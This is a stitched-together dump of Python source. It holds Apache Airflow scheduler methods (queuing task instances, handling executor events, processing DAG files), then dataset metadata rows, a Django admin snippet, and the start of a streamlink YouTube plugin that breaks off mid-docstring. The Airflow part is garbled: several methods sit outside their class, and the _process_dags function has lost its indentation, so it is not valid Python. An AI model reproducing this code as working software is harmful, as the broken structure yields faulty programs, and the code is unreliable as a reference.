            .filter(or_(DR.run_id == None,  # noqa: E711 pylint: disable=singleton-comparison
                    not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
            .outerjoin(DM, DM.dag_id == TI.dag_id)
            .filter(or_(DM.dag_id == None,  # noqa: E711 pylint: disable=singleton-comparison
                    not_(DM.is_paused)))
        )
        # Additional filters on task instance state
        if None in states:
            ti_query = ti_query.filter(
                or_(TI.state == None, TI.state.in_(states))  # noqa: E711 pylint: disable=singleton-comparison
            )
        else:
            ti_query = ti_query.filter(TI.state.in_(states))

        task_instances_to_examine = ti_query.all()

        if len(task_instances_to_examine) == 0:
            self.log.debug("No tasks to consider for execution.")
            return executable_tis

        # Put one task instance on each line
        task_instance_str = "\n\t".join(
            [repr(x) for x in task_instances_to_examine])
        self.log.info(
            "%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
            task_instance_str
        )

        # Get the pool settings
        pools = {p.pool: p for p in session.query(models.Pool).all()}

        pool_to_task_instances = defaultdict(list)
        for task_instance in task_instances_to_examine:
            pool_to_task_instances[task_instance.pool].append(task_instance)

        # dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
        dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
            states=STATES_TO_COUNT_AS_RUNNING, session=session)

        # Go through each pool, and queue up a task for execution if there are
        # any open slots in the pool.
        for pool, task_instances in pool_to_task_instances.items():
            pool_name = pool
            if pool not in pools:
                self.log.warning(
                    "Tasks using non-existent pool '%s' will not be scheduled",
                    pool
                )
                continue
            else:
                open_slots = pools[pool].open_slots(session=session)

            num_ready = len(task_instances)
            self.log.info(
                "Figuring out tasks to run in Pool(name=%s) with %s open slots "
                "and %s task instances ready to be queued",
                pool, open_slots, num_ready
            )

            # Highest priority_weight first; ties broken by oldest execution_date.
            priority_sorted_task_instances = sorted(
                task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))

            # Number of tasks that cannot be scheduled because of no open slot in pool
            num_starving_tasks = 0

            num_tasks_in_executor = 0
            for current_index, task_instance in enumerate(priority_sorted_task_instances):
                if open_slots <= 0:
                    self.log.info(
                        "Not scheduling since there are %s open slots in pool %s",
                        open_slots, pool
                    )
                    # Can't schedule any more since there are no more open slots.
                    num_starving_tasks = len(priority_sorted_task_instances) - current_index
                    break

                # Check to make sure that the task concurrency of the DAG hasn't been
                # reached.
                dag_id = task_instance.dag_id
                simple_dag = simple_dag_bag.get_dag(dag_id)

                current_dag_concurrency = dag_concurrency_map[dag_id]
                dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
                self.log.info(
                    "DAG %s has %s/%s running and queued tasks",
                    dag_id, current_dag_concurrency, dag_concurrency_limit
                )
                if current_dag_concurrency >= dag_concurrency_limit:
                    self.log.info(
                        "Not executing %s since the number of tasks running or queued "
                        "from DAG %s is >= to the DAG's task concurrency limit of %s",
                        task_instance, dag_id, dag_concurrency_limit
                    )
                    continue

                # Per-task concurrency cap (the operator's task_concurrency arg).
                task_concurrency_limit = simple_dag.get_task_special_arg(
                    task_instance.task_id,
                    'task_concurrency')
                if task_concurrency_limit is not None:
                    current_task_concurrency = task_concurrency_map[
                        (task_instance.dag_id, task_instance.task_id)
                    ]

                    if current_task_concurrency >= task_concurrency_limit:
                        self.log.info("Not executing %s since the task concurrency for"
                                      " this task has been reached.", task_instance)
                        continue

                if self.executor.has_task(task_instance):
                    self.log.debug(
                        "Not handling task %s as the executor reports it is running",
                        task_instance.key
                    )
                    num_tasks_in_executor += 1
                    continue
                # Selected: claim a slot and bump the in-memory concurrency
                # counters so later candidates see the updated totals.
                executable_tis.append(task_instance)
                open_slots -= 1
                dag_concurrency_map[dag_id] += 1
                task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1

            Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
                        num_starving_tasks)
            Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
                        pools[pool_name].open_slots())
            Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
                        pools[pool_name].occupied_slots())

        # NOTE(review): num_tasks_in_executor / num_starving_tasks are bound
        # inside the pool loop, so these gauges reflect only the last pool
        # iterated, and would raise NameError if every pool hit the
        # "non-existent pool" continue above — confirm intended.
        Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
        Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
        Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
        Stats.gauge('scheduler.tasks.executable', len(executable_tis))

        task_instance_str = "\n\t".join(
            [repr(x) for x in executable_tis])
        self.log.info(
            "Setting the following tasks to queued state:\n\t%s", task_instance_str)

        # so these dont expire on commit
        for ti in executable_tis:
            copy_dag_id = ti.dag_id
            copy_execution_date = ti.execution_date
            copy_task_id = ti.task_id
            make_transient(ti)
            ti.dag_id = copy_dag_id
            ti.execution_date = copy_execution_date
            ti.task_id = copy_task_id
        return executable_tis
    @provide_session
    def _change_state_for_executable_task_instances(self, task_instances,
                                                    acceptable_states, session=None):
        """
        Changes the state of task instances in the list with one of the given states
        to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.

        :param task_instances: TaskInstances to change the state of
        :type task_instances: list[airflow.models.TaskInstance]
        :param acceptable_states: Filters the TaskInstances updated to be in these states
        :type acceptable_states: Iterable[State]
        :rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
        """
        if len(task_instances) == 0:
            session.commit()
            return []

        TI = models.TaskInstance
        # Match each candidate TI by its (dag_id, task_id, execution_date) key.
        filter_for_ti_state_change = (
            [and_(
                TI.dag_id == ti.dag_id,
                TI.task_id == ti.task_id,
                TI.execution_date == ti.execution_date)
                for ti in task_instances])
        ti_query = (
            session
            .query(TI)
            .filter(or_(*filter_for_ti_state_change)))

        if None in acceptable_states:
            ti_query = ti_query.filter(
                or_(TI.state == None, TI.state.in_(acceptable_states))  # noqa pylint: disable=singleton-comparison
            )
        else:
            ti_query = ti_query.filter(TI.state.in_(acceptable_states))

        # Row-level lock so concurrent schedulers can't queue the same TIs.
        tis_to_set_to_queued = (
            ti_query
            .with_for_update()
            .all())

        if len(tis_to_set_to_queued) == 0:
            self.log.info("No tasks were able to have their state changed to queued.")
            session.commit()
            return []

        # set TIs to queued state
        for task_instance in tis_to_set_to_queued:
            task_instance.state = State.QUEUED
            # Preserve an existing queued timestamp (e.g. from a prior attempt).
            task_instance.queued_dttm = (timezone.utcnow()
                                         if not task_instance.queued_dttm
                                         else task_instance.queued_dttm)
            session.merge(task_instance)

        # Generate a list of SimpleTaskInstance for the use of queuing
        # them in the executor.
        simple_task_instances = [SimpleTaskInstance(ti) for ti in
                                 tis_to_set_to_queued]

        task_instance_str = "\n\t".join(
            [repr(x) for x in tis_to_set_to_queued])
        # The commit also releases the FOR UPDATE row locks taken above.
        session.commit()
        self.log.info("Setting the following %s tasks to queued state:\n\t%s",
                      len(tis_to_set_to_queued), task_instance_str)
        return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
                                              simple_task_instances):
    """
    Takes task_instances, which should have been set to queued, and enqueues them
    with the executor.

    :param simple_task_instances: TaskInstances to enqueue
    :type simple_task_instances: list[SimpleTaskInstance]
    :param simple_dag_bag: Should contains all of the task_instances' dags
    :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
    """
    TI = models.TaskInstance
    # Hand every queued TI to the executor, one at a time.
    for simple_ti in simple_task_instances:
        owning_dag = simple_dag_bag.get_dag(simple_ti.dag_id)
        # Build the CLI command the executor will run for this TI.
        run_command = TI.generate_command(
            simple_ti.dag_id,
            simple_ti.task_id,
            simple_ti.execution_date,
            local=True,
            mark_success=False,
            ignore_all_deps=False,
            ignore_depends_on_past=False,
            ignore_task_deps=False,
            ignore_ti_state=False,
            pool=simple_ti.pool,
            file_path=owning_dag.full_filepath,
            pickle_id=owning_dag.pickle_id)

        self.log.info(
            "Sending %s to executor with priority %s and queue %s",
            simple_ti.key, simple_ti.priority_weight, simple_ti.queue
        )
        self.executor.queue_command(
            simple_ti,
            run_command,
            priority=simple_ti.priority_weight,
            queue=simple_ti.queue)
@provide_session
def _execute_task_instances(self,
                            simple_dag_bag,
                            states,
                            session=None):
    """
    Attempts to execute TaskInstances that should be executed by the scheduler.

    There are three steps:
    1. Pick TIs by priority with the constraint that they are in the expected states
       and that we do exceed max_active_runs or pool limits.
    2. Change the state for the TIs above atomically.
    3. Enqueue the TIs in the executor.

    :param simple_dag_bag: TaskInstances associated with DAGs in the
        simple_dag_bag will be fetched from the DB and executed
    :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
    :param states: Execute TaskInstances in these states
    :type states: tuple[airflow.utils.state.State]
    :return: Number of task instance with state changed.
    """
    executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
                                                          session=session)

    def query(result, items):
        # Reducer passed to reduce_in_chunks: flips one chunk of TIs to
        # QUEUED, enqueues them in the executor, and accumulates the count.
        simple_tis_with_state_changed = \
            self._change_state_for_executable_task_instances(items,
                                                             states,
                                                             session=session)
        self._enqueue_task_instances_with_queued_state(
            simple_dag_bag,
            simple_tis_with_state_changed)
        session.commit()
        return result + len(simple_tis_with_state_changed)

    # Chunking bounds the size of each DB query to max_tis_per_query TIs.
    return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
    """
    If there are tasks left over in the executor,
    we set them back to SCHEDULED to avoid creating hanging tasks.

    :param session: session for ORM operations
    """
    if self.executor.queued_tasks:
        TI = models.TaskInstance
        # Match each leftover queued task by its full key, including the
        # try number, so that a newer attempt of the same TI is untouched.
        filter_for_ti_state_change = (
            [and_(
                TI.dag_id == dag_id,
                TI.task_id == task_id,
                TI.execution_date == execution_date,
                # The TI.try_number will return raw try_number+1 since the
                # ti is not running. And we need to -1 to match the DB record.
                TI._try_number == try_number - 1,
                TI.state == State.QUEUED)
                for dag_id, task_id, execution_date, try_number
                in self.executor.queued_tasks.keys()])
        ti_query = (session.query(TI)
                    .filter(or_(*filter_for_ti_state_change)))
        # Lock the rows so another scheduler cannot act on them concurrently.
        tis_to_set_to_scheduled = (ti_query
                                   .with_for_update()
                                   .all())
        if len(tis_to_set_to_scheduled) == 0:
            session.commit()
            return

        # set TIs back to the SCHEDULED state so they will be retried later
        for task_instance in tis_to_set_to_scheduled:
            task_instance.state = State.SCHEDULED

        task_instance_str = "\n\t".join(
            [repr(x) for x in tis_to_set_to_scheduled])

        session.commit()
        self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag:
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
    """
    Respond to executor events.

    Drains the executor's event buffer for the DAGs in ``simple_dag_bag``
    and reconciles each reported terminal state against the TI in the DB.
    """
    # TODO: this shares quite a lot of code with _manage_executor_state

    TI = models.TaskInstance
    for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
                           .items()):
        dag_id, task_id, execution_date, try_number = key
        self.log.info(
            "Executor reports execution of %s.%s execution_date=%s "
            "exited with status %s for try_number %s",
            dag_id, task_id, execution_date, state, try_number
        )
        if state == State.FAILED or state == State.SUCCESS:
            qry = session.query(TI).filter(TI.dag_id == dag_id,
                                           TI.task_id == task_id,
                                           TI.execution_date == execution_date)
            ti = qry.first()
            if not ti:
                self.log.warning("TaskInstance %s went missing from the database", ti)
                continue

            # TODO: should we fail RUNNING as well, as we do in Backfills?
            # If the TI is still QUEUED for the same try the executor says
            # finished, the worker never picked it up / it was killed
            # externally -> fail the TI through its failure callbacks.
            if ti.try_number == try_number and ti.state == State.QUEUED:
                msg = ("Executor reports task instance {} finished ({}) "
                       "although the task says its {}. Was the task "
                       "killed externally?".format(ti, state, ti.state))
                self.log.error(msg)
                try:
                    # Re-parse the DAG file to get the task and run its
                    # failure handling (callbacks, retries, emails).
                    simple_dag = simple_dag_bag.get_dag(dag_id)
                    dagbag = models.DagBag(simple_dag.full_filepath)
                    dag = dagbag.get_dag(dag_id)
                    ti.task = dag.get_task(task_id)
                    ti.handle_failure(msg)
                except Exception:
                    # Best effort: if the DAG cannot be re-parsed, fail the
                    # TI directly without callbacks or retries.
                    self.log.error("Cannot load the dag bag to handle failure for %s"
                                   ". Setting task to FAILED without callbacks or "
                                   "retries. Do you have enough resources?", ti)
                    ti.state = State.FAILED
                    session.merge(ti)
                    session.commit()
def _execute(self):
    """
    Entry point for the scheduler job: set up the DAG file processor agent,
    run the main scheduling loop, and tear everything down on exit.
    """
    self.log.info("Starting the scheduler")

    # DAGs can be pickled for easier remote execution by some executors
    pickle_dags = False
    if self.do_pickle and self.executor.__class__ not in \
            (executors.LocalExecutor, executors.SequentialExecutor):
        pickle_dags = True

    self.log.info("Processing each file at most %s times", self.num_runs)

    # Build up a list of Python files that could contain DAGs
    self.log.info("Searching for files in %s", self.subdir)
    known_file_paths = list_py_file_paths(self.subdir)
    self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)

    def processor_factory(file_path, zombies):
        # Factory handed to the agent so each file gets its own processor.
        return DagFileProcessor(file_path,
                                pickle_dags,
                                self.dag_ids,
                                zombies)

    # When using sqlite, we do not use async_mode
    # so the scheduler job and DAG parser don't access the DB at the same time.
    async_mode = not self.using_sqlite

    processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
    processor_timeout = timedelta(seconds=processor_timeout_seconds)
    self.processor_agent = DagFileProcessorAgent(self.subdir,
                                                 known_file_paths,
                                                 self.num_runs,
                                                 processor_factory,
                                                 processor_timeout,
                                                 async_mode)

    try:
        self._execute_helper()
    except Exception:
        self.log.exception("Exception when executing execute_helper")
    finally:
        # Always stop the agent's child processes, even on failure.
        self.processor_agent.end()
        self.log.info("Exited execute loop")
def _execute_helper(self):
    """
    The actual scheduler loop. The main steps in the loop are:

    #. Harvest DAG parsing results through DagFileProcessorAgent
    #. Find and queue executable tasks
        #. Change task instance state in DB
        #. Queue tasks in executor
    #. Heartbeat executor
        #. Execute queued tasks in executor asynchronously
        #. Sync on the states of running tasks

    Following is a graphic representation of these steps.

    .. image:: ../docs/img/scheduler_loop.jpg

    :rtype: None
    """
    self.executor.start()

    self.log.info("Resetting orphaned tasks for active dag runs")
    self.reset_state_for_orphaned_tasks()

    # Start after resetting orphaned tasks to avoid stressing out DB.
    self.processor_agent.start()

    execute_start_time = timezone.utcnow()

    # Last time that self.heartbeat() was called.
    last_self_heartbeat_time = timezone.utcnow()

    # For the execute duration, parse and schedule DAGs
    while True:
        self.log.debug("Starting Loop...")
        loop_start_time = time.time()

        if self.using_sqlite:
            self.processor_agent.heartbeat()
            # For the sqlite case w/ 1 thread, wait until the processor
            # is finished to avoid concurrent access to the DB.
            self.log.debug(
                "Waiting for processors to finish since we're using sqlite")
            self.processor_agent.wait_until_finished()

        self.log.debug("Harvesting DAG parsing results")
        simple_dags = self.processor_agent.harvest_simple_dags()
        self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))

        # Send tasks for execution if available
        # NOTE(review): simple_dag_bag is rebuilt identically inside the
        # ``if`` below; this first construction looks redundant — confirm.
        simple_dag_bag = SimpleDagBag(simple_dags)

        if len(simple_dags) > 0:
            try:
                simple_dag_bag = SimpleDagBag(simple_dags)

                # Handle cases where a DAG run state is set (perhaps manually) to
                # a non-running state. Handle task instances that belong to
                # DAG runs in those states

                # If a task instance is up for retry but the corresponding DAG run
                # isn't running, mark the task instance as FAILED so we don't try
                # to re-run it.
                self._change_state_for_tis_without_dagrun(simple_dag_bag,
                                                          [State.UP_FOR_RETRY],
                                                          State.FAILED)
                # If a task instance is scheduled or queued or up for reschedule,
                # but the corresponding DAG run isn't running, set the state to
                # NONE so we don't try to re-run it.
                self._change_state_for_tis_without_dagrun(simple_dag_bag,
                                                          [State.QUEUED,
                                                           State.SCHEDULED,
                                                           State.UP_FOR_RESCHEDULE],
                                                          State.NONE)

                self._execute_task_instances(simple_dag_bag,
                                             (State.SCHEDULED,))
            except Exception as e:
                self.log.error("Error queuing tasks")
                self.log.exception(e)
                # NOTE(review): this ``continue`` skips the executor heartbeat
                # and event processing below for this iteration — confirm
                # that is intentional.
                continue

        # Call heartbeats
        self.log.debug("Heartbeating the executor")
        self.executor.heartbeat()

        self._change_state_for_tasks_failed_to_execute()

        # Process events from the executor
        self._process_executor_events(simple_dag_bag)

        # Heartbeat the scheduler periodically
        time_since_last_heartbeat = (timezone.utcnow() -
                                     last_self_heartbeat_time).total_seconds()
        if time_since_last_heartbeat > self.heartrate:
            self.log.debug("Heartbeating the scheduler")
            self.heartbeat()
            last_self_heartbeat_time = timezone.utcnow()

        is_unit_test = conf.getboolean('core', 'unit_test_mode')
        loop_end_time = time.time()
        loop_duration = loop_end_time - loop_start_time
        self.log.debug(
            "Ran scheduling loop in %.2f seconds",
            loop_duration)

        if not is_unit_test:
            self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
            time.sleep(self._processor_poll_interval)

        # Exit the loop once every known file has been parsed num_runs times.
        if self.processor_agent.done:
            self.log.info("Exiting scheduler loop as all files"
                          " have been processed {} times".format(self.num_runs))
            break

        # Throttle very fast loops to at most ~1 iteration/second.
        if loop_duration < 1 and not is_unit_test:
            sleep_length = 1 - loop_duration
            self.log.debug(
                "Sleeping for {0:.2f} seconds to prevent excessive logging"
                .format(sleep_length))
            sleep(sleep_length)

    # Stop any processors
    self.processor_agent.terminate()

    # Verify that all files were processed, and if so, deactivate DAGs that
    # haven't been touched by the scheduler as they likely have been
    # deleted.
    if self.processor_agent.all_files_processed:
        self.log.info(
            "Deactivating DAGs that haven't been touched since %s",
            execute_start_time.isoformat()
        )
        models.DAG.deactivate_stale_dags(execute_start_time)

    self.executor.end()

    settings.Session.remove()
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]):
    """
    Find the DAGs that are not paused to process.

    :param dags: specified DAGs
    :param paused_dag_ids: paused DAG IDs
    :return: DAGs to process
    """
    # When the scheduler is restricted to specific DAG ids, honour that
    # whitelist in addition to filtering out paused DAGs.
    restrict_to = set(self.dag_ids)
    if restrict_to:
        return [dag for dag in dags
                if dag.dag_id in restrict_to
                and dag.dag_id not in paused_dag_ids]
    return [dag for dag in dags if dag.dag_id not in paused_dag_ids]
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
    """
    Process a Python file containing Airflow DAGs.

    This includes:

    1. Execute the file and look for DAG objects in the namespace.
    2. Pickle the DAG and save it to the DB (if necessary).
    3. For each DAG, see what tasks should run and create appropriate task
    instances in the DB.
    4. Record any errors importing the file into ORM
    5. Kill (in ORM) any task instances belonging to the DAGs that haven't
    issued a heartbeat in a while.

    Returns a list of SimpleDag objects that represent the DAGs found in
    the file

    :param file_path: the path to the Python file that should be executed
    :type file_path: unicode
    :param zombies: zombie task instances to kill.
    :type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
    :param pickle_dags: whether serialize the DAGs found in the file and
        save them to the db
    :type pickle_dags: bool
    :return: a list of SimpleDags made from the Dags found in the file,
        and the number of import errors
    :rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
    """
    self.log.info("Processing file %s for tasks to queue", file_path)
    # As DAGs are parsed from this file, they will be converted into SimpleDags
    simple_dags = []

    try:
        dagbag = models.DagBag(file_path, include_examples=False)
    except Exception:
        self.log.exception("Failed at reloading the DAG file %s", file_path)
        Stats.incr('dag_file_refresh_error', 1, 1)
        # BUG FIX: every other return path yields (list, int); this path
        # previously returned ([], []), which broke the declared contract.
        return [], 0

    if len(dagbag.dags) > 0:
        self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
    else:
        self.log.warning("No viable dags retrieved from %s", file_path)
        self.update_import_errors(session, dagbag)
        return [], len(dagbag.import_errors)

    # Save individual DAGs in the ORM and update DagModel.last_scheduled_time
    for dag in dagbag.dags.values():
        dag.sync_to_db()

    paused_dag_ids = {dag.dag_id for dag in dagbag.dags.values() if dag.is_paused}

    # Pickle the DAGs (if necessary) and put them into a SimpleDag
    # NOTE(review): self.dag_ids restricts ``dags`` below but not this list
    # of SimpleDags — confirm that asymmetry is intended.
    for dag_id in dagbag.dags:
        # Only return DAGs that are not paused
        if dag_id not in paused_dag_ids:
            dag = dagbag.get_dag(dag_id)
            pickle_id = None
            if pickle_dags:
                pickle_id = dag.pickle(session).id
            simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))

    dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)

    # Not using multiprocessing.Queue() since it's no longer a separate
    # process and due to some unusual behavior. (empty() incorrectly
    # returns true as described in https://bugs.python.org/issue23582 )
    ti_keys_to_schedule = []

    self._process_dags(dagbag, dags, ti_keys_to_schedule)

    for ti_key in ti_keys_to_schedule:
        dag = dagbag.dags[ti_key[0]]
        task = dag.get_task(ti_key[1])
        ti = models.TaskInstance(task, ti_key[2])

        # Lock the TI row so concurrent schedulers cannot race this update.
        ti.refresh_from_db(session=session, lock_for_update=True)
        # We check only deps needed to set TI to SCHEDULED state here.
        # Deps needed to set TI to QUEUED state will be batch checked later
        # by the scheduler for better performance.
        dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)

        # Only schedule tasks that have their dependencies met, e.g. to avoid
        # a task that recently got its state changed to RUNNING from somewhere
        # other than the scheduler from getting its state overwritten.
        if ti.are_dependencies_met(
                dep_context=dep_context,
                session=session,
                verbose=True):
            # Task starts out in the scheduled state. All tasks in the
            # scheduled state will be sent to the executor
            ti.state = State.SCHEDULED

        # Also save this task instance to the DB.
        self.log.info("Creating / updating %s in ORM", ti)
        session.merge(ti)
    # commit batch
    session.commit()

    # Record import errors into the ORM
    try:
        self.update_import_errors(session, dagbag)
    except Exception:
        self.log.exception("Error logging import errors!")
    # Kill off any TIs whose heartbeat went stale while we were parsing.
    try:
        dagbag.kill_zombies(zombies)
    except Exception:
        self.log.exception("Error killing zombies!")

    return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
    """Emit a scheduler-heartbeat metric each time the job heartbeats."""
    Stats.incr('scheduler_heartbeat', 1, 1)
| 41.862351 | 130 | 0.579599 |
7d156194a0293321df3b2191953f99c068f230c7 | 170 | py | Python | manager/admin.py | Emiliemorais/ido | 5b0c8b9a3ba006c221b7768370d2593cc38d3a17 | [
"BSD-2-Clause"
] | null | null | null | manager/admin.py | Emiliemorais/ido | 5b0c8b9a3ba006c221b7768370d2593cc38d3a17 | [
"BSD-2-Clause"
] | null | null | null | manager/admin.py | Emiliemorais/ido | 5b0c8b9a3ba006c221b7768370d2593cc38d3a17 | [
"BSD-2-Clause"
] | null | null | null | from django.contrib import admin
from manager.models import Enterprise
class EnterpriseAdmin(admin.ModelAdmin):
pass
admin.site.register(Enterprise, EnterpriseAdmin) | 28.333333 | 48 | 0.835294 |
6d6e9ef0036957b658de5520d2e68b2692fb86de | 12,794 | py | Python | src/streamlink/plugins/youtube.py | Erk-/streamlink | d240704d1237fb5878960480c3f8951e0c5023b9 | [
"BSD-2-Clause"
] | 2 | 2021-03-29T12:19:06.000Z | 2021-05-06T07:08:04.000Z | resources/lib/streamlink/plugins/youtube.py | jairoxyz/script.module.streamlink_matrix | a29afed7188590595ef06decde8bfee45202cbc0 | [
"BSD-2-Clause"
] | null | null | null | resources/lib/streamlink/plugins/youtube.py | jairoxyz/script.module.streamlink_matrix | a29afed7188590595ef06decde8bfee45202cbc0 | [
"BSD-2-Clause"
] | null | null | null | import json
import logging
import re
from html import unescape
from urllib.parse import urlparse, urlunparse
from streamlink.plugin import Plugin, PluginError, pluginmatcher
from streamlink.plugin.api import useragents, validate
from streamlink.plugin.api.utils import itertags
from streamlink.stream import HLSStream, HTTPStream
from streamlink.stream.ffmpegmux import MuxedStream
from streamlink.utils import parse_json, search_dict
log = logging.getLogger(__name__)
# Matches watch/embed/v/ video URLs, embedded live streams, channel pages
# (optionally with /live) and youtu.be short links.
@pluginmatcher(re.compile(r"""
    https?://(?:\w+\.)?youtube\.com/
    (?:
        (?:
            (?:
                watch\?(?:.*&)*v=
                |
                (?P<embed>embed)/(?!live_stream)
                |
                v/
            )(?P<video_id>[\w-]{11})
        )
        |
        embed/live_stream\?channel=(?P<embed_live>[^/?&]+)
        |
        (?:c(?:hannel)?/|user/)?(?P<channel>[^/?]+)(?P<channel_live>/live)?/?$
    )
    |
    https?://youtu\.be/(?P<video_id_short>[\w-]{11})
""", re.VERBOSE))
class YouTube(Plugin):
    # Regexes extracting the embedded JSON blobs from the watch-page HTML.
    _re_ytInitialData = re.compile(r"""var\s+ytInitialData\s*=\s*({.*?})\s*;\s*</script>""", re.DOTALL)
    _re_ytInitialPlayerResponse = re.compile(r"""var\s+ytInitialPlayerResponse\s*=\s*({.*?});\s*var\s+meta\s*=""", re.DOTALL)
    # Splits a mimeType string such as 'video/mp4; codecs="avc1..."'.
    _re_mime_type = re.compile(r"""^(?P<type>\w+)/(?P<container>\w+); codecs="(?P<codecs>.+)"$""")

    # Canonical URL templates used when normalizing input URLs.
    _url_canonical = "https://www.youtube.com/watch?v={video_id}"
    _url_channelid_live = "https://www.youtube.com/channel/{channel_id}/live"

    # itag -> video quality label for adaptive (video-only) formats.
    # There are missing itags
    adp_video = {
        137: "1080p",
        299: "1080p60",  # HFR
        264: "1440p",
        308: "1440p60",  # HFR
        266: "2160p",
        315: "2160p60",  # HFR
        138: "2160p",
        302: "720p60",  # HFR
        135: "480p",
        133: "240p",
        160: "144p",
    }
    # itag -> audio bitrate (kbit/s) for adaptive audio formats.
    adp_audio = {
        140: 128,
        141: 256,
        171: 128,
        249: 48,
        250: 64,
        251: 160,
        256: 256,
        258: 258,
    }
def __init__(self, url):
    """Normalize the input URL to a canonical https://www.youtube.com form."""
    super().__init__(url)
    parsed = urlparse(url)
    # translate input URLs to be able to find embedded data and to avoid unnecessary HTTP redirects
    if parsed.netloc == "gaming.youtube.com":
        self.url = urlunparse(parsed._replace(scheme="https", netloc="www.youtube.com"))
    elif self.match.group("video_id_short") is not None:
        # youtu.be short link -> canonical watch URL
        self.url = self._url_canonical.format(video_id=self.match.group("video_id_short"))
    elif self.match.group("embed") is not None:
        # embed player URL -> canonical watch URL
        self.url = self._url_canonical.format(video_id=self.match.group("video_id"))
    elif self.match.group("embed_live") is not None:
        # embedded live stream -> the channel's /live page
        self.url = self._url_channelid_live.format(channel_id=self.match.group("embed_live"))
    elif parsed.scheme != "https":
        self.url = urlunparse(parsed._replace(scheme="https"))

    # Filled in by _get_streams() from the video details.
    self.author = None
    self.title = None

    self.session.http.headers.update({'User-Agent': useragents.CHROME})
def get_author(self):
    """Return the channel name resolved in _get_streams(), or None."""
    return self.author

def get_title(self):
    """Return the video title resolved in _get_streams(), or None."""
    return self.title
@classmethod
def stream_weight(cls, stream):
    """
    Rank stream names, demoting 3D variants slightly and promoting
    high-frame-rate (e.g. "720p60") variants over their base quality.
    """
    m3d = re.match(r"(\w+)_3d", stream)
    mhfr = re.match(r"(\d+p)(\d+)", stream)
    if m3d:
        # 3D streams rank just below their 2D counterpart.
        base_weight, _ = Plugin.stream_weight(m3d.group(1))
        return base_weight - 1, "youtube_3d"
    if mhfr:
        # HFR streams rank just above the same resolution at normal rate.
        base_weight, _ = Plugin.stream_weight(mhfr.group(1))
        return base_weight + 1, "high_frame_rate"
    return Plugin.stream_weight(stream)
@classmethod
def _schema_playabilitystatus(cls, data):
    """Validate the player response and return (status, reason)."""
    schema = validate.Schema(
        {"playabilityStatus": {
            "status": str,
            validate.optional("reason"): str
        }},
        validate.get("playabilityStatus"),
        validate.union_get("status", "reason")
    )
    return validate.validate(schema, data)
@classmethod
def _schema_videodetails(cls, data):
    """
    Validate the videoDetails section of the player response and return
    (videoId, author, title, isLive).
    """
    schema = validate.Schema(
        {"videoDetails": {
            "videoId": str,
            "author": str,
            "title": str,
            validate.optional("isLive"): validate.transform(bool),
            validate.optional("isLiveContent"): validate.transform(bool),
            validate.optional("isLiveDvrEnabled"): validate.transform(bool),
            validate.optional("isLowLatencyLiveStream"): validate.transform(bool),
            validate.optional("isPrivate"): validate.transform(bool),
        }},
        validate.get("videoDetails"),
    )
    videoDetails = validate.validate(schema, data)
    log.trace(f"videoDetails = {videoDetails!r}")
    # Second pass extracts just the fields the caller needs.
    return validate.validate(
        validate.union_get("videoId", "author", "title", "isLive"),
        videoDetails)
@classmethod
def _schema_streamingdata(cls, data):
    """
    Validate the streamingData section and return
    (hlsManifestUrl, formats, adaptiveFormats); the lists default to [].

    Note: the "url" keys are optional in the schema — they are absent for
